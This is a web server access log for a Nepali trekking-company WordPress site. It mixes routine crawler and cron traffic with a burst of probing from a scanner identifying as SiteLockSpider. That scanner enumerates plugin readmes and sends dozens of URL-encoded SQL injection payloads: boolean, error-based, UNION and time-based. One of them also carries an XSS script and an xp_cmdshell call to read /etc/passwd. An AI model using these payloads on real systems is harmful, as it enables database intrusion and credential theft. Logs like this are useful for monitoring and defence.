184.154.139.41 - - [09/Jun/2026:09:53:39 -0400] "GET /hbl-online-payment/?=1&adv_payment=1&arrival_date=1&city=1&country=1&departure_date=1&email_address=1&full_payment=1&fullname=1&inform=1&no_persons=1&pay_later=1&payment-percent=1&travel_date=1&trip_name=Chitwan%20Jungle%20Safari HTTP/1.1" 200 2711 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
63.250.38.253 - - [09/Jun/2026:09:54:12 -0400] "POST /wp-cron.php?doing_wp_cron=1781013252.2546629905700683593750 HTTP/1.1" 200 0 "-" "WordPress/7.0; https://blissfulnepal.com"
66.249.69.65 - - [09/Jun/2026:09:54:11 -0400] "GET /products/4040012 HTTP/1.1" 404 20947 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.193.221.41 - - [09/Jun/2026:09:54:15 -0400] "GET /wp-content/uploads/2024/01/sunrise-over-the-kathmandu-city-2023-11-27-05-36-32-utc-scaled.jpg HTTP/1.1" 200 676878 "https://www.bing.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36 Edg/148.0.0.0"
63.250.38.253 - - [09/Jun/2026:09:54:25 -0400] "POST /wp-cron.php?doing_wp_cron=1781013265.8146181106567382812500 HTTP/1.1" 200 0 "-" "WordPress/7.0; https://blissfulnepal.com"
184.154.139.41 - - [09/Jun/2026:09:54:02 -0400] "GET /hbl-online-payment/?=1799&adv_payment=1&arrival_date=1&city=1&country=1&departure_date=1&email_address=1&full_payment=1&fullname=1&inform=1&no_persons=1&pay_later=1&payment-percent=1&travel_date=1&trip_name=Everest%20Base%20Camp%20Trek%20with%20Helicopter%20Return HTTP/1.1" 200 2711 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
184.154.139.41 - - [09/Jun/2026:09:54:26 -0400] "GET /payment/?=2026-06-08&tour-date=1&tour-id=6328 HTTP/1.1" 200 105627 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
184.154.139.41 - - [09/Jun/2026:09:54:27 -0400] "GET /payment/?=2026-06-06&package=Everest%20Base%20Camp%20Trek%20-%20All%20Included%20Trip&tour-date=1&tour-id=5959&tour-people=1 HTTP/1.1" 200 105627 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
184.154.139.41 - - [09/Jun/2026:09:54:29 -0400] "GET /payment/?=2026-06-07&tour-date=1&tour-id=6328 HTTP/1.1" 200 105627 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
184.154.139.41 - - [09/Jun/2026:09:54:31 -0400] "GET /payment/?=2026-06-07&package=Everest%20Base%20Camp%20Trek%20-%20All%20Included%20Trip&tour-date=1&tour-id=5959&tour-people=1 HTTP/1.1" 200 105627 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
184.154.139.41 - - [09/Jun/2026:09:54:32 -0400] "GET /payment/?=2026-06-06&tour-date=1&tour-id=6328 HTTP/1.1" 200 105627 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
184.154.139.41 - - [09/Jun/2026:09:54:34 -0400] "GET /payment/?=2026-06-08&package=Everest%20Base%20Camp%20Trek%20-%20All%20Included%20Trip&tour-date=1&tour-id=5959&tour-people=1 HTTP/1.1" 200 105627 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
184.154.139.41 - - [09/Jun/2026:09:54:35 -0400] "GET /payment/?=2026-06-08&tour-date=1&tour-id=6257&tour-people=1 HTTP/1.1" 200 105627 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
184.154.139.41 - - [09/Jun/2026:09:54:37 -0400] "GET /payment/?=2026-06-08&tour-date=1&tour-id=6191&tour-people=1 HTTP/1.1" 200 105627 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
184.154.139.41 - - [09/Jun/2026:09:54:39 -0400] "GET /payment/?=2026-06-06&tour-date=1&tour-id=6321&tour-people=1 HTTP/1.1" 200 105627 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
184.154.139.41 - - [09/Jun/2026:09:54:40 -0400] "GET /payment/?=2026-06-06&tour-date=1&tour-id=6325&tour-people=1 HTTP/1.1" 200 105627 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
136.117.127.80 - - [09/Jun/2026:09:54:55 -0400] "GET /wp-content/uploads/sb-instagram-feed-images/blissfulnepalofficial.webp HTTP/1.1" 200 7282 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36"
66.249.69.65 - - [09/Jun/2026:09:55:02 -0400] "GET /products/19139078 HTTP/1.1" 404 20947 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
184.154.139.41 - - [09/Jun/2026:09:54:42 -0400] "GET /hbl-online-payment/?=1699&adv_payment=1&arrival_date=1&city=1&country=1&departure_date=1&email_address=1&full_payment=1&fullname=1&inform=1&no_persons=1&pay_later=1&payment-percent=1&travel_date=1&trip_name=Manaslu%20Circuit%20Trek HTTP/1.1" 200 2711 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
184.154.139.41 - - [09/Jun/2026:09:55:05 -0400] "GET /payment/?=2026-06-08&tour-date=1&tour-id=6325&tour-people=1 HTTP/1.1" 200 105627 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
184.154.139.41 - - [09/Jun/2026:09:55:07 -0400] "GET /payment/?=2026-06-07&tour-date=1&tour-id=6263&tour-people=1 HTTP/1.1" 200 105627 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
184.154.139.41 - - [09/Jun/2026:09:55:08 -0400] "GET / HTTP/1.1" 301 0 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
184.154.139.41 - - [09/Jun/2026:09:55:09 -0400] "GET //wp-content/plugins/wp-google-map-plugin/readme.txt HTTP/1.1" 200 21726 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
63.250.38.253 - - [09/Jun/2026:09:55:10 -0400] "POST /?wordfence_syncAttackData=1781013310.2527 HTTP/1.1" 200 0 "-" "WordPress/7.0; https://blissfulnepal.com"
184.154.139.41 - - [09/Jun/2026:09:55:10 -0400] "GET /wp-content/plugins/tlp-team/readme.txt HTTP/1.1" 404 104114 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
184.154.139.41 - - [09/Jun/2026:09:55:12 -0400] "GET //wp-content/plugins/newsletter/readme.txt HTTP/1.1" 200 13988 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
184.154.139.41 - - [09/Jun/2026:09:55:12 -0400] "GET //wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 301 0 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
63.250.38.253 - - [09/Jun/2026:09:55:20 -0400] "POST /?wordfence_syncAttackData=1781013320.2936 HTTP/1.1" 200 0 "-" "WordPress/7.0; https://blissfulnepal.com"
184.154.139.41 - - [09/Jun/2026:09:55:20 -0400] "GET /?redirect=6272 HTTP/1.1" 200 42465 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:55:23 -0400] "GET /?redirect=6272&FGAg=6398%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 403 1242 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:55:23 -0400] "GET /?redirect=6272 HTTP/1.1" 200 42539 "-" "SiteLockSpider"
63.250.38.253 - - [09/Jun/2026:09:55:28 -0400] "POST /wp-cron.php?doing_wp_cron=1781013328.1077280044555664062500 HTTP/1.1" 200 0 "-" "WordPress/7.0; https://blissfulnepal.com"
184.154.139.41 - - [09/Jun/2026:09:55:27 -0400] "GET /?redirect=6272%2C%28.%22%29%27%29%2C.%2C HTTP/1.1" 200 42537 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:55:29 -0400] "GET /?redirect=6272%27hVEhbf%3C%27%22%3EwWNsta HTTP/1.1" 200 42535 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:55:33 -0400] "GET /?redirect=6272%29%20AND%207687%3D6415%20AND%20%289030%3D9030 HTTP/1.1" 200 42537 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:55:37 -0400] "GET /?redirect=6272%29%20AND%204847%3D4847%20AND%20%285629%3D5629 HTTP/1.1" 200 42537 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:55:40 -0400] "GET /?redirect=6272%29%20AND%207453%3D6238%20AND%20%289956%3D9956 HTTP/1.1" 200 42536 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:55:43 -0400] "GET /?redirect=6272%20AND%207543%3D5950 HTTP/1.1" 200 42537 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:55:46 -0400] "GET /?redirect=6272%20AND%204847%3D4847 HTTP/1.1" 200 42535 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:55:47 -0400] "GET /?redirect=6272%20AND%209718%3D6149 HTTP/1.1" 200 42542 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:55:49 -0400] "GET /?redirect=6272%20AND%209987%3D8724--%20LjYd HTTP/1.1" 200 42537 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:55:51 -0400] "GET /?redirect=6272%20AND%204847%3D4847--%20hyIv HTTP/1.1" 200 42537 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:55:52 -0400] "GET /?redirect=6272%20AND%202634%3D5549--%20BwGk HTTP/1.1" 200 42539 "-" "SiteLockSpider"
66.249.69.65 - - [09/Jun/2026:09:55:54 -0400] "GET /products/1371589 HTTP/1.1" 404 20947 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
184.154.139.41 - - [09/Jun/2026:09:55:54 -0400] "GET /?redirect=6272%27%29%20AND%205493%3D7106%20AND%20%28%27NQsR%27%3D%27NQsR HTTP/1.1" 200 42526 "-" "SiteLockSpider"
66.249.69.65 - - [09/Jun/2026:09:55:55 -0400] "GET /products/30661301 HTTP/1.1" 404 20947 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
184.154.139.41 - - [09/Jun/2026:09:55:55 -0400] "GET /?redirect=6272%27%29%20AND%204847%3D4847%20AND%20%28%27bmhI%27%3D%27bmhI HTTP/1.1" 200 42542 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:55:57 -0400] "GET /?redirect=6272%27%29%20AND%209799%3D5511%20AND%20%28%27eQTn%27%3D%27eQTn HTTP/1.1" 200 42536 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:55:58 -0400] "GET /?redirect=6272%27%20AND%202565%3D1879%20AND%20%27oxTW%27%3D%27oxTW HTTP/1.1" 200 42536 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:00 -0400] "GET /?redirect=6272%27%20AND%204847%3D4847%20AND%20%27XmDg%27%3D%27XmDg HTTP/1.1" 200 42537 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:02 -0400] "GET /?redirect=6272%27%20AND%201303%3D5417%20AND%20%27qqAS%27%3D%27qqAS HTTP/1.1" 200 42537 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:03 -0400] "GET /?redirect=%28SELECT%20%28CASE%20WHEN%20%283714%3D4560%29%20THEN%206272%20ELSE%20%28SELECT%204560%20UNION%20SELECT%207281%29%20END%29%29 HTTP/1.1" 403 1242 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:03 -0400] "GET /?redirect=%28SELECT%20%28CASE%20WHEN%20%281796%3D1796%29%20THEN%206272%20ELSE%20%28SELECT%205512%20UNION%20SELECT%207436%29%20END%29%29 HTTP/1.1" 403 1242 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:03 -0400] "GET /?redirect=6272%29%20AND%20EXTRACTVALUE%288945%2CCONCAT%280x5c%2C0x7162627171%2C%28SELECT%20%28ELT%288945%3D8945%2C1%29%29%29%2C0x7176766b71%29%29%20AND%20%284724%3D4724 HTTP/1.1" 403 6990 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:04 -0400] "GET /?redirect=6272%20AND%20EXTRACTVALUE%288945%2CCONCAT%280x5c%2C0x7162627171%2C%28SELECT%20%28ELT%288945%3D8945%2C1%29%29%29%2C0x7176766b71%29%29 HTTP/1.1" 403 6990 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:04 -0400] "GET /?redirect=6272%20AND%20EXTRACTVALUE%288945%2CCONCAT%280x5c%2C0x7162627171%2C%28SELECT%20%28ELT%288945%3D8945%2C1%29%29%29%2C0x7176766b71%29%29--%20VEac HTTP/1.1" 403 6990 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:04 -0400] "GET /?redirect=6272%27%29%20AND%20EXTRACTVALUE%288945%2CCONCAT%280x5c%2C0x7162627171%2C%28SELECT%20%28ELT%288945%3D8945%2C1%29%29%29%2C0x7176766b71%29%29%20AND%20%28%27fTEU%27%3D%27fTEU HTTP/1.1" 403 6990 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:05 -0400] "GET /?redirect=6272%27%20AND%20EXTRACTVALUE%288945%2CCONCAT%280x5c%2C0x7162627171%2C%28SELECT%20%28ELT%288945%3D8945%2C1%29%29%29%2C0x7176766b71%29%29%20AND%20%27QGdo%27%3D%27QGdo HTTP/1.1" 403 6990 "-" "SiteLockSpider"
63.250.38.253 - - [09/Jun/2026:09:56:05 -0400] "POST /?wordfence_syncAttackData=1781013365.7163 HTTP/1.1" 200 0 "-" "WordPress/7.0; https://blissfulnepal.com"
63.250.38.253 - - [09/Jun/2026:09:56:07 -0400] "POST /wp-cron.php?doing_wp_cron=1781013367.2553319931030273437500 HTTP/1.1" 200 0 "-" "WordPress/7.0; https://blissfulnepal.com"
184.154.139.41 - - [09/Jun/2026:09:56:05 -0400] "GET /?redirect=6272%29%20AND%202247%3DCAST%28%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282247%3D2247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%284285%3D4285 HTTP/1.1" 200 42537 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:07 -0400] "GET /?redirect=6272%20AND%202247%3DCAST%28%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282247%3D2247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29 HTTP/1.1" 200 42537 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:09 -0400] "GET /?redirect=6272%20AND%202247%3DCAST%28%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282247%3D2247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29--%20BMUy HTTP/1.1" 200 42535 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:10 -0400] "GET /?redirect=6272%27%29%20AND%202247%3DCAST%28%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282247%3D2247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%28%27eZSF%27%3D%27eZSF HTTP/1.1" 200 42537 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:11 -0400] "GET /?redirect=6272%27%20AND%202247%3DCAST%28%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282247%3D2247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%27qKyr%27%3D%27qKyr HTTP/1.1" 200 42535 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:13 -0400] "GET /?redirect=6272%29%20AND%206272%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29%20AND%20%286088%3D6088 HTTP/1.1" 403 6990 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:13 -0400] "GET /?redirect=6272%20AND%206272%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29 HTTP/1.1" 403 6990 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:13 -0400] "GET /?redirect=6272%20AND%206272%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29--%20HZMt HTTP/1.1" 403 6990 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:14 -0400] "GET /?redirect=6272%27%29%20AND%206272%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29%20AND%20%28%27dDBa%27%3D%27dDBa HTTP/1.1" 403 6990 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:14 -0400] "GET /?redirect=6272%27%20AND%206272%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29%20AND%20%27nNyi%27%3D%27nNyi HTTP/1.1" 403 6990 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:14 -0400] "GET /?redirect=6272%29%20AND%209422%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289422%3D9422%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%289253%3D9253 HTTP/1.1" 403 6990 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:15 -0400] "GET /?redirect=6272%20AND%209422%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289422%3D9422%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 HTTP/1.1" 403 6983 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:15 -0400] "GET /?redirect=6272%20AND%209422%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289422%3D9422%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29--%20vLIg HTTP/1.1" 403 6990 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:15 -0400] "GET /?redirect=6272%27%29%20AND%209422%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289422%3D9422%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27zzIP%27%3D%27zzIP HTTP/1.1" 403 6990 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:15 -0400] "GET /?redirect=6272%27%20AND%209422%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289422%3D9422%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27uGDE%27%3D%27uGDE HTTP/1.1" 403 6990 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:16 -0400] "GET /?redirect=%28SELECT%20CONCAT%28CONCAT%28%27qbbqq%27%2C%28CASE%20WHEN%20%289248%3D9248%29%20THEN%20%271%27%20ELSE%20%270%27%20END%29%29%2C%27qvvkq%27%29%29 HTTP/1.1" 403 6990 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:16 -0400] "GET /?redirect=6272%29%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 403 1242 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:16 -0400] "GET /?redirect=6272%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 403 1242 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:16 -0400] "GET /?redirect=6272%27%29%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 403 1242 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:16 -0400] "GET /?redirect=6272%27%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 403 1242 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:17 -0400] "GET /?redirect=6272%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 403 1242 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:17 -0400] "GET /?redirect=6272%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 403 1242 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:17 -0400] "GET /?redirect=6272%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 403 1242 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:17 -0400] "GET /?redirect=6272%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 403 1242 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:17 -0400] "GET /?redirect=6272%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28119%29%7C%7CCHR%2889%29%7C%7CCHR%2866%29%7C%7CCHR%28100%29%2C5%29%20FROM%20DUAL-- HTTP/1.1" 403 1242 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:17 -0400] "GET /?redirect=6272%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28119%29%7C%7CCHR%2889%29%7C%7CCHR%2866%29%7C%7CCHR%28100%29%2C5%29%20FROM%20DUAL-- HTTP/1.1" 403 1242 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:17 -0400] "GET /?redirect=6272%27%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28119%29%7C%7CCHR%2889%29%7C%7CCHR%2866%29%7C%7CCHR%28100%29%2C5%29%20FROM%20DUAL-- HTTP/1.1" 403 1242 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:18 -0400] "GET /?redirect=6272%27%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28119%29%7C%7CCHR%2889%29%7C%7CCHR%2866%29%7C%7CCHR%28100%29%2C5%29%20FROM%20DUAL-- HTTP/1.1" 403 1242 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:18 -0400] "GET /?redirect=6272%29%20AND%20%28SELECT%204393%20FROM%20%28SELECT%28SLEEP%285%29%29%29QtuY%29%20AND%20%281305%3D1305 HTTP/1.1" 403 233 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:18 -0400] "GET /?redirect=6272%20AND%20%28SELECT%204393%20FROM%20%28SELECT%28SLEEP%285%29%29%29QtuY%29 HTTP/1.1" 403 233 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:18 -0400] "GET /?redirect=6272%20AND%20%28SELECT%204393%20FROM%20%28SELECT%28SLEEP%285%29%29%29QtuY%29--%20DZHP HTTP/1.1" 403 234 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:18 -0400] "GET /?redirect=6272%27%29%20AND%20%28SELECT%204393%20FROM%20%28SELECT%28SLEEP%285%29%29%29QtuY%29%20AND%20%28%27CTur%27%3D%27CTur HTTP/1.1" 403 233 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:19 -0400] "GET /?redirect=6272%27%20AND%20%28SELECT%204393%20FROM%20%28SELECT%28SLEEP%285%29%29%29QtuY%29%20AND%20%27vkLB%27%3D%27vkLB HTTP/1.1" 403 231 "-" "SiteLockSpider"
63.250.38.253 - - [09/Jun/2026:09:56:19 -0400] "POST /?wordfence_syncAttackData=1781013379.6109 HTTP/1.1" 200 0 "-" "WordPress/7.0; https://blissfulnepal.com"
